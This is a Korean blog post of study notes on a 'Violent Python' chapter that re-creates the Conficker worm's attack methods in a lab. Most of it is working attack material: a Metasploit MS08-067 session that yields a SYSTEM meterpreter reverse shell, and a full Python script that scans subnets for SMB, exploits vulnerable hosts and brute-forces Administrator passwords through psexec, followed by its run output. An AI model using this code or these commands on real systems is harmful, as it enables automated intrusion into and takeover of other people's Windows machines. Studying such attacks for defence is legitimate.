Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
해커의 언어, 치명적 파이썬 – CHAPTER 1 소개
해커의 언어, 치명적 파이썬 – CHAPTER 2 침투 테스트 – 포트 스캐너 만들기
해커의 언어, 치명적 파이썬 – CHAPTER 2 침투 테스트 – SSH 봇넷 구축하기
해커의 언어, 치명적 파이썬 – CHAPTER 2 침투 테스트 – FTP와 웹을 이용한 대규모 공격
해커의 언어, 치명적 파이썬 – CHAPTER 2 침투 테스트 – 컨피커 노력하면 된다
2.5 컨피커, 노력하면 된다
컨피커 – http://blog.naver.com/younjun2000?Redirect=Log&logNo=150046319543
– 컨피커 또는 W32DownadUp 이라 불리는 웜은 200여개국에 5백만대의 컴퓨터를 감염
– 컨피커의 핵심은 모리스웜이 사용했던 공격 백터와 유사한 기법이 사용(두개의 백터를 이용)
1.윈도우 서버의 제로데이 취약점(스텍을 변조하여 쉘코드를 실행하고, 감염된 호스트에 자신의 복사본을 다운로드)
2.디폴트 관리자 네크워크 공유(ADMIN$) 계정에 무차별 대입공격
2.5.1 메타스플로잇으로 윈도우 SMB 서비스 공격하기
– ms08_067_netapi 이용
root@bt:~# msfconsole
...
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.110.129
RHOST => 192.168.110.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.110.133
LHOST => 192.168.110.133
msf exploit(ms08_067_netapi) > set LPORT 7777
LPORT => 7777
msf exploit(ms08_067_netapi) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.110.133:7777
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Korean
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.110.129
[*] Meterpreter session 1 opened (192.168.110.133:7777 -> 192.168.110.129:1157) at 2013-08-21 15:10:36 +0900
msf exploit(ms08_067_netapi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ SDS 192.168.110.133:7777 -> 192.168.110.129:1157 (192.168.110.129)
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
meterpreter > execute -i -f cmd.exe
Process 2364 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter ???? ???? ???? 2:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.110.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.110.2
C:\WINNT\system32>
2.5.2 메타스플로잇과 파이썬 연동하기
– 여러대의 서버를 진행시 수동으로 하기 힘드므로 파이썬으로 작성
1. SMB 프로토콜(TCP 445) 포트가 열려있는지 스캐닝(nmap-python 사용)
2. 메타스플로잇 resource 파일을 만들어서 취약한 호스트를 공격
3. 메타스플로잇의 다이나믹 페이로드인 미터프리터(Meterpreter)를 사용
4. multi/handler 리스너 설정… 무슨 소린지 잘모르겠음..ㅠ
5. 마지막으로 exploit -j(작업의 컨택스트에서) -z(작업과 즉시 상호소통하지 말고) 으로 공격지시
2.5.3 원격 프로세스 실행 공격하기
– SMB 의 사용자 이름/패스워드 조합을 마차별 대입 공격 하도록 smbBrute 함수 작성
– smbBrute 함수는 각 페스워드 마다 메타스플로잇 설정파일을 만들어서 공격
2.5.4 컨피커 최종 코드 통합하기
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import optparse
import sys
import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet, '445')
tgtHosts = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print '[+] Found Target Host: ' + host
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile, lhost, lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('set payload windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile,tgtHost,lhost,lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set payload windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
def smbBrute(configFile,tgtHost,passwdFile,lhost,lport):
username = 'Administrator'
pF = open(passwdFile, 'r')
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set payload windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
def main():
configFile = open('meta.rc', 'w')
parser = optparse.OptionParser('[-] Usage %prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address[es]')
parser.add_option('-p', dest='lport', type='string', help='specify the listen port')
parser.add_option('-l', dest='lhost', type='string', help='specify the listen address')
parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt')
(options, args) = parser.parse_args()
if (options.tgtHost == None) | (options.lhost == None):
print parser.usage
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '1337'
passwdFile = options.passwdFile
tgtHosts = findTgts(options.tgtHost)
setupHandler(configFile, lhost, lport)
for tgtHost in tgtHosts:
confickerExploit(configFile, tgtHost, lhost, lport)
if passwdFile != None:
smbBrute(configFile,tgtHost,passwdFile,lhost,lport)
configFile.close()
os.system('msfconsole -r meta.rc')
if __name__ == '__main__':
main()
실행결과
# python conficker.py -H 192.168.110.129 -l 192.168.110.133 -p 7777 -F userpass.txt
[+] Found Target Host: 192.168.110.129
...
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
[*] Processing meta.rc for ERB directives.
resource (meta.rc)> use exploit/multi/handler
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[*] Exploit running as background job.
resource (meta.rc)> setg DisablePayloadHandler 1
DisablePayloadHandler => 1
resource (meta.rc)> use exploit/windows/smb/ms08_067_netapi
[*] Started reverse handler on 192.168.110.133:7777
[*] Starting the payload handler...
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (meta.rc)> set SMBPass administrator:password
SMBPass => administrator:password
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[*] Automatically detecting the target...
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
[*] Connecting to the server...
SMBUser => Administrator
resource (meta.rc)> set SMBPass admin:12345
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
SMBPass => admin:12345
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (meta.rc)> set SMBPass root:secret
[*] Connecting to the server...
SMBPass => root:secret
resource (meta.rc)> set RHOST 192.168.110.129
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
resource (meta.rc)> set SMBUser Administrator
[*] Connecting to the server...
SMBUser => Administrator
resource (meta.rc)> set SMBPass guest:guest
[*] Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:Korean
[*] Selected Target: Windows 2000 Universal
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
SMBPass => guest:guest
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
resource (meta.rc)> use exploit/windows/smb/psexec
[*] Attempting to trigger the vulnerability...
resource (meta.rc)> set SMBUser Administrator
[*] Connecting to the server...
SMBUser => Administrator
resource (meta.rc)> set SMBPass root:toor
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
SMBPass => root:toor
resource (meta.rc)> set RHOST 192.168.110.129
RHOST => 192.168.110.129
resource (meta.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (meta.rc)> set LPORT 7777
LPORT => 7777
resource (meta.rc)> set LHOST 192.168.110.133
[*] Sending stage (752128 bytes) to 192.168.110.129
LHOST => 192.168.110.133
resource (meta.rc)> exploit -j -z
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Exploit running as background job.
[*] Connecting to the server...
[*] Authenticating to 192.168.110.129:445|WORKGROUP as user 'Administrator'...
msf exploit(psexec) > [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Meterpreter session 1 opened (192.168.110.133:7777 -> 192.168.110.129:1184) at 2013-08-21 17:14:36 +0900
4 Responses to 해커의 언어, 치명적 파이썬 – CHAPTER 2 침투 테스트 – 컨피커 노력하면 된다